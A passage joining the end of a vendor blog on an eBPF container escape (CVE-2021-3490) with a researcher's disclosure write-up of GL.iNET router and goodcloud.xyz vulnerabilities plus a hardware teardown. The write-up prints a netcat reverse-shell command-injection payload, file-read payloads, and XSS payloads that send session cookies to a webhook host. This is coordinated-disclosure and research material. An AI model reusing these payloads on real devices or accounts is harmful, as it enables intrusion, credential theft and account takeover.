 and matching on features of the exploit process other than the PID, such as the 
comm
 member of 
struct task
 that contains the executable name.

Container Escape Mitigations

Detecting this and similar exploits is very hard as they are data-only and misuse only legitimate system calls. The CrowdStrike Falcon platform can assist in preventing attacks using similar techniques for privilege escalation. As a defense-in-depth strategy, the following steps can be taken to harden Linux hosts and container environments to prevent exploitation of CVE-2021-3490 and future attacks.

  1. Upgrade the kernel version. With a critical kernel vulnerability like CVE-2021-3490, it is paramount that available fixes are applied by upgrading the kernel version.
  2. Provide only required capabilities to the container. By limiting the capabilities of the container, the root account of the container becomes limited in its capabilities, which significantly reduces the chances of container escape and exploitation of kernel vulnerabilities. For example, to exploit the CVE-2021-3490 using the described technique, the attacker needs CAP_BPF or CAP_SYS_ADMIN granted. Note that privileged containers have those capabilities. Therefore, you should monitor your environment for such containers with CrowdStrike Falcon® Cloud Workload Protection (CWP), as discussed in point 4 below.
  3. Use a seccomp profile. While Kubernetes does not apply a seccomp profile without configuration, Docker’s default seccomp profiles protect against a number of dangerous system calls that can help attackers to break out of the container environment. Correct Seccomp profiles can help significantly reduce the container attack surface. CVE-2021-3490 requires the 
    bpf
     system call to exploit the vulnerability, which is blocked in Docker’s default seccomp profile. Hence, exploitation of CVE-2021-3490 in a container environment using a strong seccomp profile would fail.
  4. Monitor host and containerized environment for a breach. In case a privileged workload or a host is compromised by attackers, the organization needs state-of-the-art monitoring and detection capabilities to prevent and detect advanced persistent threats (APTs), eCrime and nation-state actors. CrowdStrike can help with this. Falcon Cloud Workload Protection identifies any indicators of misconfiguration (IOMs) in your containerized environment to uncover a weakness. Falcon Cloud Workload Protection prevents and detects malicious activity on your host and containers to prevent and detect — in real time — breaches by eCrime and nation-state adversaries. For example, if a privileged container or a container without a seccomp profile is executed, the following notifications would appear:

Also, Falcon CWP helps to hunt for threats using the eBPF subsystem to escalate privileges by logging if the 

bpf
 system call was used by a process.

Conclusion

Container technology is a good solution to separate and fine-tune resources to different processes. However, while existing solutions add another layer of security due to the restriction of capabilities and available syscalls, the available attack surface inside a container still contains the host’s kernel. Every eased restriction — for example, allowing the use of eBPF — will increase the attack surface. If a threat actor is able to take advantage of a vulnerability inside the host’s kernel and an exploit is available, the host can be compromised, regardless of other security layers and restrictions such as namespaces.

This blog showed exactly that: Not much effort is needed to turn a full exploit chain for a local privilege escalation into one that is able to escape containers as well. The basic rules of network hygiene (patch early and often) not only apply to containers but to the hosts that deploy those in a cloud environment as well. Moreover, solutions such as Docker and Kubernetes can reduce the attack surface drastically if configured properly. CrowdStrike Falcon Cloud Workload Protectioncan assist in identifying and hunting for weaknesses in the deployed configuration that could lead to a compromise.

Additional Resources

Vulnerabilities and Hardware Teardown of GL.iNET GL-MT300N-V2 Router

Vulnerabilities and Hardware Teardown of GL.iNET GL-MT300N-V2 Router

Original text by Olivier Laflamme

I’ve really enjoyed reversing cheap/weird IoT devices in my free time. In early May of 2022, I went on an Amazon/AliExpress shopping spree and purchased ~15 cheap IoT devices. Among them was this mini portable router by GL.iNET.  

GL.iNET is a leading developer of OpenWrt Wi-Fi and IoT network solutions and to my knowledge is a Chinese company based out in Hong Kong & USA. They offer a wide variety of products, and the company’s official website is www.gl-inet.com. The GL-MT300N-V2 firmware version I dove into was 

V3.212
released on April 29th, 2022 for the Mango model. The goodcloud remote cloud management gateway was 
Version 1.00.220412.00
.

This blog will be separated into two sections. The first half contains software vulnerabilities, this includes the local web application and the remote cloud peripherals. The second mainly consists of an attempted hardware teardown.  

I like to give credit where credit is due. The GL.iNET team was really awesome to work & communicate with. They genuinely care about the security posture of their products. So I'd like to give some quick praise for being an awesome vendor that kept me in the loop throughout the patching/disclosure process.  

In terms of overall timeline/transparency, I started testing on-and-off between 

May 2nd 2022
 to 
June 15th 2022
. After reporting the initial command injection vulnerability GL.iNET asked if I were interested in monetary compensation to find additional bugs. We ultimately agreed to public disclosure & the release of this blog in exchange for continued testing. As a result, I was given safe passage and continued to act in good faith. Lastly, the GL.iNet also shipped me their (GL-AX1800 / Flint) for additional testing. GL.iNet does nothave a BBP or VDP program, I asked, and was given permission to perform the tests I did. In other words, think twice before poking at their infrastructure and being a nuisance.

Having vulnerabilities reported should never be seen as a defeat or failure. Development and security are intertwined in a never ending cycle. There will always be vulnerabilities in all products that take risks on creativity, innovation, and change - the essence of pioneering.

Vulnerabilities List

A total of 6 vulnerabilities were identified in GL.iNet routers and IoT cloud gateway peripheral web applications:

1. OS command injection on router & cloud gateway (CVE-2022-31898)
2. Arbitrary file read on router via cloud gateway (CVE-2022-42055)
3. PII data leakage via user enumeration leading to account takeover
4. Account takeover via stored cross-site scripting (CVE-2022-42054)
5. Account takeover via weak password requirements & lack of rate limiting
6. Password policy bypass leading to single character passwords 

Web Application 

OS Command Injection 

The MT300N-V2 portable router is affected by an OS Command Injection vulnerability that allows authenticated attackers to run arbitrary commands on the affected system as the application’s user. This vulnerability exists within the local web interface and remote cloud interface. This vulnerability stems from improper validation of input passed through the ping (

ping_addr
) and traceroute (
trace_addr
) parameters. The vulnerability affects ALL GL.iNET product’s firmware  
&gt;3.2.12
.

Fixed in firmware 

Version 3.215
 stable build 
SHA256: 8d761ac6a66598a5b197089e6502865f4fe248015532994d632f7b5757399fc7

Vulnerability Details

CVE ID: CVE-2022-31898
Access Vector: Remote/Adjacent
Security Risk: High
Vulnerability: CWE-78
CVSS Base Score: 8.4
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

I’ll run through the entire discovery process. There exists a file on disk 

/www/src/router/router.js
 which essentially manages the application panels. Think of it as the endpoint reference in charge of calling different features and functionality. As seen below, the path parameter points to the endpoint containing the router feature’s location on disk. When the endpoint such as 
/attools
 is fetched its respective 
.js
.html
, and 
.css
 files are loaded onto the page.

Through this endpoint, I quickly discovered that a lot of these panels were not actually accessible through the web UI’s sidebar seen below.

However, the functionality of these endpoints existed and were properly configured & referenced. Visually speaking, within the application they don’t have a sidebar «button» or action that can redirect us to it. 

Here is a full list of endpoints that can not be accessed through web UI actions.

http://192.168.8.1/#/ping    <-------- Vulnerable
http://192.168.8.1/#/apitest
http://192.168.8.1/#/attools
http://192.168.8.1/#/smessage
http://192.168.8.1/#/sendmsg
http://192.168.8.1/#/gps
http://192.168.8.1/#/cells
http://192.168.8.1/#/siderouter
http://192.168.8.1/#/rs485
http://192.168.8.1/#/adguardhome
http://192.168.8.1/#/sms
http://192.168.8.1/#/log
http://192.168.8.1/#/process
http://192.168.8.1/#/blelist
http://192.168.8.1/#/bluetooth

I should mention that some of these endpoints do become available after connecting modems, and other peripheral devices to the router. See the documentation for more details https://docs.gl-inet.com/.

As seen above, there exists a 

ping
 endpoint. From experience, these are always interesting. This endpoint has the ability to perform typical 
ping
 and 
traceroute
 commands. Let’s quickly confirm that these files exist, 
/ping
actions get called as defined within the 
router.js
 file.

root@GL-MT300N-V2:/www/src/temple/ping# pwd && ls /www/src/temple/ping index.CSS index.html index.js

The expected usage and output can be seen below.

What’s OS Command Injection? OS command injection is a fairly common vulnerability seen in such endpoints. Its typically exploited by using command operators ( 

|
 ,
&amp;&amp;
;
, etc,) that would allow you to execute multiple commands in succession, regardless of whether each previous command succeeds. 

Looking back at the ping portal, the UI (frontend) sanitizes the user-provided input against the following regex which is a very common implementation for validating IPv4 addresses.

Therefore, 

;
 isn’t an expected IPv4 schema character so when the 
pingIP()
check is performed, and any invalid characters will fail the request.

And we’re presented with the following error message.

We need to feed malicious content into the parameter 

pingValue
. If we do this successfully and don’t fail the check, our request will be sent to the web server where the server application act upon the input.

To circumvent the input sanitization on the front-end we will send our post request to the webserver directly using Burp Suite. This way we can simply modify the POST request without the front-end sanitization being forced. As mentioned above, using the 

;
 command separator we should be able to achieve command injection through the 
ping_addr
 or 
trace_addr
 parameters. If I’ve explained this poorly, perhaps the following visual can help.

Image Credit: I‘m on Your Phone, Listening – Attacking VoIP Configuration Interfaces

Let’s give it a try. If you look closely at the POST request below the 

ping_addr
value is 
;/bin/pwd%20
 which returned the present working directory of the application user. Confirming that OS Command Injection had been successfully performed.

Now let’s do an obligatory cat of 

/etc/passwd
 by feeding the following input 
;/bin/cat /etc/passwd 2>&amp;1

Okay, let’s go ahead and get a reverse shell.

Payload: 
;rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|/usr/bin/nc 192.168.8.193 4000 >/tmp/f

URL encoded:
;rm%20/tmp/f;mknod%20/tmp/f%20p;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|/usr/bin/nc%20192.168.8.193%204000%20>%20tmp%20f

Cool, but this attack scenario kinda sucks… we need to be authenticated, on the same network, etc, etc. One of the main reasons I think this is a cool find, and why it’s not simply a local attack vector is that we can configure our device with the vendor’s IoT cloud gateway! This cloud gateway allows us to deploy and manage our connected IoT gateways remotely.

I’ve discovered that there are roughly 

~30000
 devices configured this way. One of the features of this cloud management portal is the ability to access your device’s admin panel remotely through a public-facing endpoint. Such can be seen below.

As you may have guessed, command injection could be performed from this endpoint as well.

In theory, any attacker with the ability to hijack goodcloud.xyz user sessions or compromise a user account (both achieved in this blog) could potentially leverage this attack vector to gain a foothold on a network compromise. 

Additional things you can do:

Scan internal network:
GET /cgi-bin/api/repeater/scan

Obtain WiFi password of joined SSID's
GET /cgi-bin/api/repeater/manager/list

Obtain WiFi password of routers SSID's
GET /cgi-bin/api/ap/info 

Disclosure Timeline 

May 2, 2022: Initial discovery
May 2, 2020: Vendor contacted
May 3, 2022: Vulnerability reported to the vendor
May 10, 2022: Vulnerability confirmed by the vendor
July 6, 2022: CVE reserved
July 7, 2022: Follow up with the vendor
October 13, 2022: Fixed in firmware 3.215


Arbitrary File Read

The MT300N-V2 portable router, configured along sides the vendor’s cloud management gateway (goodcloud.xyz) is vulnerable to Arbitrary File Read. The remote cloud gateway is intended to facilitate remote device access and management. This vulnerability exists within the cloud manager web interface and is only a feature available to enterprise users. The device editing interface tools harbors the 

ping
 and 
traceroute
 functionality which is vulnerable to a broken type of command injection whose behavior is limited to performing arbitrary file reads. Successful exploitation of this vulnerability will allow an attacker to access sensitive files and data on the router. It is possible to read any arbitrary files on the file system, including application source code, configuration, and other critical system files. 

Vulnerability Details

CVE ID: CVE-2022-42055
Access Vector: Remote
Security Risk: Medium
Vulnerability: CWE-23 & CWE-25
CVSS Base Score: 6.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Enterprise users will have the 

TOOLS
 menu when editing their devices as seen below.

The 

ping_addr
 and 
trace_addr
 both allow you to read any file on disk when prepending 
;/bin/sh
 to the file you want to read.

I’m not sure why this happens. I have not been able to get regular command injection due to the way its calling 

ping
 and 
traceroute
 within busybox from what I assume is data passing through something similar to a ngrok tunnel. I can’t use funky delimiters or common escapes to simply comment out the rest of the operation. Anyhow, valid payloads would look like the following:

;bin/sh%20/<PATH_TO_FILE>

&bin/sh%20/<PATH_TO_FILE>

As a POC I’ve created a 

flag.txt
 file in 
/tmp
 on my router and I’m going to read it from the cloud gateway. I could just as easily read the 
passwd
 and 
shadow
 files. Successfully cracking them offline would allow me access to both the cloud ssh terminal, and the login UI.

Funny enough, this action can then be seen getting processed by the logs on the cloud gateway. So definitely not «OPSEC» friendly.

Disclosure Timeline 

May 25, 2022: Initial discovery
May 25, 2022: Vendor contacted & vulnerability reported
May 26, 2022: Vendor confirms vulnerability
July 7, 2022: Follow up with the vendor
October 13, 2022: Fixed in firmware 3.215


PII Data Leakage & User Enumeration 

The MT300N-V2 portable router has the ability to be configured along sides the vendor’s cloud management gateway (goodcloud.xyz) which allows for remote access and management.  This vulnerability exists within the cloud manager web interface through the device-sharing endpoint 

cloud-api/cloud/user/get-user?nameoremail=
 GET request.  Successful enumeration of a user will result in that user’s PII information being disclosed. At its core, this is a funky IDOR. The vulnerability affected the goodcloud.xyz prior to May, 12th 2022. 

Vulnerability Details

CVE ID: N/A
Access Vector: Network
Security Risk: Medium
Vulnerability: CWE-200 & CWE-203
CVSS Base Score: 6.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

I identified roughly  

~30,000
 users which were enumerated via their username or email address. Successful enumeration compromises the confidentiality of the user. This vulnerability returns sensitive information that could be leveraged by a sophisticated, and motivated attacker to compromise the user’s account credentials. 

This attack is performed after creating a regular 

goodcloud.xyz
 cloud gateway account and linking your GL.iNet device. In the image below we see that our device can be shared with another registered user.

The request and response for sharing a device with another user are seen below.

Performing this 

get-user
 request against an existing user will disclosure the following account information:

- company name
- account creation time
- credential's salt (string+MD5)
- account email
- account user ID
- last login time
- nickname
- password hash (MD5)
- phone number
- password salt (MD5)
- secret key
- security value (boolean)
- status value (boolean)
- account last updated time
- application user id
- username

The password appears to be MD5 HMAC but the actual formatting/order is unknown, and not something I deem necessary to figure out. That being said, given all the information retrieved from the disclosure I believe the chances of finding the right combination to be fairly high. Below is an example of how it could be retrieved.

Additionally, I discovered no rate-limiting mechanisms in place for sharing devices. Therefore, it’s relatively easy to enumerate a good majority of valid application users using Burp Suite intruder.

Another observation I made, which was not confirmed with the vendor (so is purely speculation) I noticed that not every user had a 

secret
 value associated with their account. I suspect that perhaps this secret code is actually leveraged for the 2FA QR code creation mechanism. The syntax would resemble something like this:

<a href="https://www.google.com/chart?chs=200x200&amp;chld=M|0&amp;cht=qr&amp;chl=otpauth://totp/%3CUSER%20HERE%3E?secret=%3CSECRET%20HERE%3E&amp;issuer=goodcloud.xyz">https://www.google.com/chart?chs=200x200&amp;chld=M|0&amp;cht=qr&amp;chl=otpauth://totp/&lt;USER HERE>?secret=&lt;SECRET HERE>&amp;issuer=goodcloud.xyz</a>

This is purely speculative. 

The GL.iNET team was extremely quick to remediate this issue. Less than 12h after reporting it a fix was applied as seen below.

Disclosure Timeline 

May 11, 2022: Initial discovery
May 11, 2022: Vendor contacted & vulnerability reported
May 11, 2022: Vendor confirms vulnerability
May 12, 2022: Vendor patched the vulnerability


Stored Cross-Site Scripting

The MT300N-V2 portable router has the ability to join itself to the remote cloud management configuration gateway (goodcloud.xyz) which allows for remote management of linked IoT devices.  There exist multiple user input fields that do not properly sanitize user-supplied input. As a result, the application is vulnerable to stored cross-site scripting attacks. If this attack is leveraged against an enterprise account through the 

Sub Account
 invitation it can lead to the account takeover of the joined accounts. 

Vulnerability Details

CVE ID: CVE-2022-42054
Access Vector: Network
Security Risk: Medium
Vulnerability: CWE-79
CVSS Base Score: 8.7
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:H

We’ll find the vulnerable inputs field in the «Group Lists» panel, in which a user can modify and create as many groups as they want.

The vulnerable fields are 

Company
 and 
Description
. The payloads I used as a proof of concept are the following:

<img src=x onerror=confirm(document.cookie)>

or

<img src=x onerror=&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x64;&#x6f;&#x63;&#x75;&#x6d;&#x65;&#x6e;&#x74;&#46;&#x63;&#x6f;&#x6f;&#x6b;&#x69;&#x65;&#x29;>

Once the group is saved anytime the user either logs in or switches regions (Asia Pacific, America, Europe), logs in, or switched organication the XSS will trigger as seen below.

This occurs because there is a 

listQuery
 key that checks for 
{"pageNum":"","pageSize":"","name":"","company":"","description":""}
 and our XSS is stored and referenced within 
company
 name & 
description
 which is how the XSS triggers.

Can this be used maliciously? Unfortunately not with regular user accounts. With enterprise accounts yes, as we’ll see later. Here’s why. Realistically the only way to leverage this would be to share a device with a malicious named 

company
 and 
description
 fields with another user. 

Even with the patch for the PII and User Enumeration vulnerability above, it is still possible to enumerate 

userID
‘s which is exactly what we need to send a shared device invitation to users. Below is an example request.

An attacker with a regular user account would create a group with a 

company
 or 
description
 name like 
&lt;script type=“text/javascript”&gt;document.location=“http://x.x.x.x:xxxx/?c=“+document.cookie;&lt;/script&gt;
. Then invite a victim to that group. When the victim would login the attacker would able to steal their sessions. Unfortunately with a regular user account, this isn’t possible. 

If we share the device from 

boschko
(attacker) to 
boschko1
(victim). Here’s how the chain would go. After 
boschko
 creates the malicious group and sends an invitation to 
boschko1
 he’s done. The victim 
boschko1
 would login and receive the invite from 
boschko
 as seen below.

However, when we sign-out and back into 

boschko1
 no XSS triggered, why? It’s because there is a difference between being a member of a shared group (a group shared by another user with you) and being the owner (you made the group shared and created) as can be seen below.

As seen above, a user of a shared group won’t have the malicious fields of the group translated to their «frontend».

HOWEVER! If you have a business/enterprise account or are logged in as a business/enterprise user you can leverage this stored XSS to hijack user sessions! All thanks to features only available to business users :).

Business features provide the ability to add «Sub Accounts». You can think of this as having the ability to enroll staff/employees into your management console/organization. If a user accepts our 

subAccount
 invitation they become a staff/employee inside of our «organization». In doing so, we’ll have the ability to steal their fresh session cookies after they login because they’d become owners of the malicious group by association.

Let’s take this one step at a time. The Subscription Account panel looks like this.

I’m sure you can make out its general functionality. After inviting a user via their email address they will receive the following email.

I’ll try and break this down as clearly as I can. 

  • User A (attacker) is 
    boschko
     in red highlights. 
  • User B (victim) is 
    boschko1
     in green highlights.
  1. Step 1: Create a malicious company as 
    boschko
     with XSS company name and description
  2. Step 2: Invite 
    boschko1
     to the malicious company as 
    boschko
  3. Step 3: Get boschko1 cookies and use them to log in as him

Below is the user info of 

boschko
 who owns the company/organization 
test
. He also owns the «Group List» 
happy company
 the group which is part of the 
test
 organization.

boschko1
 has been sent an invitation email from 
boschko
boschko1
 has accepted and has been enrolled into 
boschko
‘s 
test
 organization. 
boschko1
has been given the 
Deployment Operator
 level access over the organization.

Logged into 

boschko1
 the user would see the following two «workspaces», his personal 
boschko1 (mine)
 and the one he has been invited to 
test
.

When 

boschko1
 is signed into his own team/organization 
boschko1 (mine)
, if devices are shared with him nothing bad happens.

When 

boschko1
 signes into the 
test
 organization that 
boschko
 owns by 
Switch Teams
 the malicious 
company
 and 
description
 are properly referenced/called upon when 
listQuery
 action.

The stored XSS in the malicious 

test
 company, 
company
 and 
description
fields (members of the 
happy company
 Group List) gets trigger when 
boschko1
 is signed into 
boschko
 organization 
test
.

From our malicious 

boschko
 user, we will create a group with the following malicious 
company
 and 
description
 names.

<img src=x onerror=this.src='https://webhook.site/6cb27cce-4dfd-4785-8ee8-70e932b1b8ca?c='+document.cookie>

We can leverage the following website since we’re too lazy to spin up a digital ocean droplet. With this webhook in hand, we’re ready to steal the cookies of 

boschko1
.

Above, 

boschko
 has stored the malicious javascript within his 
company
 and 
description
 fields simply log  
boschko1
 into the 
test
 organization owned by 
boschko
 and receive the cookies via the webhook.

As seen below, we get a bunch of requests made containing the session cookies of 

boschko1
.

Using the stolen 

boschko1
 session cookies the account can be hijacked.

The GL.iNET team remediated the issue by July 15 with some pretty solid/standard filtering.

I attempted a handful of bypasses with U+FF1C and U+FF1E, some more funky keyword filtering,  substrings, array methods, etc, and had no success bypassing the patch. 

Disclosure Timeline 

May 12, 2022: Initial discovery
May 12, 2022: Vendor contacted & vulnerability reported
May 13, 2022: Vendor confirms vulnerability
May 19, 2022: Contact vendor about enterprise user impact
July 7, 2022: Follow up with the vendor
July 15, 2022: Vendor patched the vulnerability


Weak Password Requirements & No Rate Limiting

The MT300N-V2 portable router has the ability to join itself to the remote cloud management configuration gateway with its accounts created through goodcloud.xyz which allows for remote management of linked IoT devices. The login for goodcloud.xyz was observed to have no rate limiting. Additionally, user passwords only require a minimum of 6 characters and no special characters/password policy. This makes it extremely simple for an attacker to brute force user accounts leading to account takeover. 

Vulnerability Details

CVE ID: N/A
Access Vector: Network
Security Risk: Medium
Vulnerability: CWE-521
CVSS Base Score: 9.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N

As seen below when users create their cloud gateway 

goodcloud.xyz
 accounts they’re only required to have a password ≥6 with no capitalization, or special characters being required or enforced.

Additionally, due to having no rate limiting on login attempts by using Burp Suite intruder it’s trivial to spray users or brute force user accounts.

Below is an example of successfully obtaining the password for a sprayed user.

In total, I was able to recover the passwords of 

33
 application users. I never tested these credentials to log into the UI for obvious ethical reasons. All the data was reported back to the GL.iNET team.  

Disclosure Timeline 

May 18, 2022: Initial discovery
May 24, 2022: Vendor contacted & vulnerability reported
May 24, 2022: Vendor confirms vulnerability
June 7, 2022: Vendor implements rate-limiting, patching the vulnerability


Password Policy Bypass

The MT300N-V2 portable router has the ability to join itself to the remote cloud management configuration gateway (goodcloud.xyz) which allows for remote management of linked IoT devices.  For these cloud gateway accounts, while password complexity requirements were implemented in the original signup page, these were not added to the password reset page. The current lack of rate limiting this severely impacts the security posture of the affected users.

Vulnerability Details

CVE ID: N/A
Access Vector: Network
Security Risk: Medium
Vulnerability: CWE-521
CVSS Base Score: 6.7
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N

The reset password policy isn’t consistent with the registration and change password policy. As a result, it’s possible to bypass the 6-character password requirements to a single character. In general, the application should validate that the password contains alphanumeric characters and special characters with a minimum length of around eight. Additionally, I feel like it’s best practice not to allow users to set the previously used password as the new password.

As seen below, through the UI the password change has checks on the client side to ensure the password policy is respected.

In Burp Suite we can intercept the request and manually set it to a single character.

The request above is submitting successfully, and the new password for the 

boschko
 user has been set to 
1
. The request below is the login request, as you can see it was successful.

Disclosure Timeline 

May 26, 2022: Initial discovery
May 26, 2022: Vendor contacted & vulnerability reported
May 26, 2022: Vendor confirms vulnerability
July 7, 2022: Follow up with the vendor
July 15, 2022: Vulnerability has been patched


Additional Interesting Finds 

I made a few interesting discoveries that I don’t consider vulnerabilities. 

Before we jump into this one we have to quickly talk about ACL configuration. Basically, for 

rpc
 having appropriate access control over the invocations the application can make is very important. These methods should be strictly controlled. For more information on this refer to the Ubus-Wiki.

Once we’ve installed OpenWrt as seen above, the application will generate the list of 

rpc
 invocation methods for OpenWrt which is defined within the ACL configuration file 
/usr/share/rpcd/acl.d/luci-base.json
. Here is a snippet of the file in question.

...
	"luci-access": {
		"description": "Grant access to basic LuCI procedures",
		"read": {
			"cgi-io": [ "backup", "download", "exec" ],
			"file": {
				"/": [ "list" ],
				"/*": [ "list" ],
				"/dev/mtdblock*": [ "read" ],
				"/etc/crontabs/root": [ "read" ],
				"/etc/dropbear/authorized_keys": ["read"],
				"/etc/filesystems": [ "read" ],
				"/etc/rc.local": [ "read" ],
				"/etc/sysupgrade.conf": [ "read" ],
				"/etc/passwd": [ "read" ],
				"/etc/group": [ "read" ],
				"/proc/filesystems": [ "read" ],
...
		"write": {
			"cgi-io": [ "upload" ],
			"file": {
				"/etc/crontabs/root": [ "write" ],
				"/etc/init.d/firewall restart": ["exec"],
				"/etc/luci-uploads/*": [ "write" ],
				"/etc/rc.local": [ "write" ],
				"/etc/sysupgrade.conf": [ "write" ],
				"/sbin/block": [ "exec" ],
				"/sbin/firstboot": [ "exec" ],
				"/sbin/ifdown": [ "exec" ],
...

Not being a subject matter expert, I would however say that the above methods are well-defined. Methods in the file namespace aren’t simply «allow all» — 

( "file": [ "*" ] )
 if it were the case, then this would be an actual vulnerability.

rpcd
 has also a defined user in 
/etc/config/rpcd
 that we can use for the management interface. This user is used to execute code through a large number of  
rpcd
 exposed methods.

With this information in hand, we should be able to login with these credentials. As a result, we will obtain a large number of methods that can be called, and get the 

ubus_rpc_session
.

As seen in the following image this 

ubus_rpc_session
 value is used to call other methods defined in ACL config files.

Now we might look at the image above and think we have RCE of sorts. However, for some weird reason 

/etc/passwd
 is actually defined with valid read primitives within the 
luci-base.json
 ACL config file.

As seen below attempting to read any other files will result in a failed operation.

I simply found this interesting hence why I am writing about it.

Hardware Teardown 

Let’s actually start the intended project! The GL-MT300N router looks like this:

It’s nothing fancy, the device has a USB port, 2 ethernet ports (LAN & WAN), a reset button, and a mode switch. Let’s break it open and see what hardware we have on hand.

Immediately there are some interesting components. There looks to be a system on a chip (SoC), SPI flash, and some SD RAM. There is also a serial port and what looks like could potentially be JTAG, and almost definitely UART.

In terms of chipsets, there is a MediaTek MT7628NN chip which is described as being a «router on a chip» the datasheet shows it is basically the CPU and it supports the requirements for the entry-level AP/router.

Looking at the diagram of the chip there is communication for UART, SPI, and I2C which are required to transfer data. This also confirms that this chip has a serial console that can be used for debugging. If this is still enabled this could allow us to access the box while it’s running and potentially obtain a shell on the system.

The second chip is the Macronix MX25L12835F SPI (serial flash chip) this is what attacked for most of the reversing process to obtain the application’s firmware. This is because the serial flash usually contains the configuration settings, file systems, and is generally the storage for devices lacking peripherals would be stored. And looking around on the board there is no other «storage device». 

The third, and last chip is the Etron Technology EM68C16CWQG-25H which is the ram used by the device when it is running. 

Connecting to UART

Let’s quickly go over what’s UART. UART is used to send and receive data from devices over a serial connection. This is done for purposes such as updating firmware manually, debugging, or interfacing with the underlying system (kind of like opening a new terminal in Ubuntu). UART works by communicating through two wires, a transmitter wire (TX) and a receiver wire (RX) to talk to the micro-controller or system on a chip (basically the brains of the device) directly.

The receiver and transmitter marked RX and TX respectively, need to connect to a second respective UART device’s TX and RX in order to establish a communication. I’m lucky enough to have received my Flipper Zero so I’ll be using it for this!

If you would like more in-depth information on UART see my blog on hacking a fertility sperm tester. We’ll connect our Flipper Zero to the router UART connection as seen below.

The result will be a little something like this.

Since I’m a Mac user connecting to my Flipper Zero via USB will «mount» or make the device accessible at 

/dev/cu.usbmodemflip*
 so if I want to connect to it all I need to do is run the command below.

Once I’ve ran the screen command, and the router is powered on, ill start seeing serial output confirming that I’ve properly connected to UART.

As you can see, I’ve obtained a root shell. Unprotected root access via the UART is technically a vulnerability CWE-306. Connecting to the UART port drops you directly to a root shell, and exposes an unauthenticated Das U-Boot BIOS shell. This isn’t something you see too often, UART is commonly tied down. However, «exploitation» requires physical access, the device needs to be opened, and wires connecting to pads RX, TX, and GND on the main logic board. GL.iNET knows about this, and to my knowledge doesn’t plan on patching it. This is understandable as there’s no «real» impact. 

I’ll go on a «quick» rant about why unprotected UART CVEs are silly. The attack requires physical access to the device. So, an attacker has to be on-site, most likely inside a locked room where networking equipment is located, and is probably monitored by CCTV… The attacker must also attach an additional USB-to-UART component to the device’s PCB in order to gain console access. Since physically dismantling the device is required to fulfill the attack, I genuinely don’t consider this oversight from the manufacturer a serious vulnerability. Obviously, it’s not great, but realistically these types of things are at the vendor’s discretion. Moreover, even when protections are in place to disable the UART console and/or have the wide debug pads removed from the PCB there are many tricks one can use to navigate around those mechanisms.

Although personally, I believe it’s simply best practice for a hardware manufacturer to disable hardware debugging interfaces in the final product of any commercial device. Not doing so isn’t worthy of a CVE.

Getting back on track. Hypothetically if we were in a situation where we couldn’t get access to a shell from UART we’d likely be able to get one from U-Boot. There are actually a lot of different ways to get an application shell from here. Two of those techniques were covered in my blog Thanks Fo’ Nut’in — Hacking YO’s Male Fertility Sperm Test so I won’t be covering them here.

Leveraging the SPI Flash

Even though the serial console is enabled, if it weren’t, and we had no success getting a shell from U-Boot, our next avenue of attack might be to extract the firmware from the SPI flash chip. 

The goal is simple, read the firmware from the chip. There are a few options like using clips universal bus interface device, unsoldering the chip from the board and connecting it to a specialized EPROM read/write device or attaching it to a Protoboard. I like the first option and using SOIC8 clips over hook clips.

At a minimum, we’ll need a hardware tool that can interact with at least an SPI interface. I’m a big fan of the Attify Badge as it’s very efficient and supports many interfaces like SPI, UART, JTAG, I2C, GPIO, and others. But you could other devices like a professional EPROM programmer, a Bus Pirate, beagleboneRaspberry Pi, etc,.

Below is the pinout found on the datasheet for our Macronix MX25L12835F flash.

All you need to do is make the proper connections from the chip to the Attify badge. I’ve made mine according to the diagram below.

OK. I spent a solid two nights trying to dump the firmware without success. I’ve tried the Bus Pirate, Shikra, Attify, and a beaglebone black but nothing seems to work. Flashrom appears to be unable to read the data or even identify the chip, which is really weird. I’ve confirmed the pinouts are correct from the datasheet, and as seen below, flashrom supports this chip.

Attempting to dump the firmware results in the following.

So what’s going on? I’m not an EE so I had to do a lot of reading & talking to extremely patient people. Ultimately, I suspect this is happening because there is already a contention for the SPI bus (the MediaTek MT7628NN chip), and due to the nature of what we’re attempting to do, the router is receiving two masters connections and ours is not taking precedence. Currently, the MCU on the board is the master of the SPI chip, that’s the one where all the communication is going to and from. I wasn’t able to find a way to intercept, short, or stop that communication to make our Attify badge the master. In theory, a trick to get around this would be by holding down a reset button while reading the flash and just hoping to get lucky (I did this for ~2h and had no luck). Since our Attify badge would already be powered on, it could «IN THEORY» take precedence. This could, again «in theory» stop the chip from mastering to the MCU. But I haven’t been able to do so properly. I’ve spent ~8 hours on this, tying out multiple different hardware (PI, beaglebone, Attify, BusPirate) without success. I also suspect that being on a MacBook Pro with funky USB adapters could be making my situation worse.

Okay, we’re left with no other option than to go «off-chip». As previously mentioned, there are multiple ways to dump the contents of flash memory. Let’s try desoldering the component from the board, and use a chip reprogrammer to read off the contents. 

My setup is extremely cheap setup is very sub-optimal. I don’t own a fixed «hot air station» or PDC mount. I’m just using a loose heat gun.

Our goal is to apply enough heat so that the solder joints melt. We need to extracted the chip with tweezers without damaging components. Easier said then done with  my shitty station. differential heating on the board can be an issue. When a jet of hot air is applied to a PCB at room temperature, most of the heat is diffused to the colder spots, making the heating of the region of interest poor. To work around this you might think that increasing the heat will solve all of our issues. However, simply increasing the temperature is dangerous and not advisable. 

When a component is put under increased thermal stress the temperature gradient increases along the board. The temperature difference on the board will produce thermal expansion in different areas, producing mechanical stress that may damage the board, break, and shift components. Not good. My setup is prone to this type of error because I don’t have a mounting jig for the heat gun that can control distance. I don’t have any high-temperature tape I can apply to the surrounding components so that they don’t get affected by my shaky hand controlling the heat source.

Regardless, for most small components, a preheating temperature of 250º C should be enough.

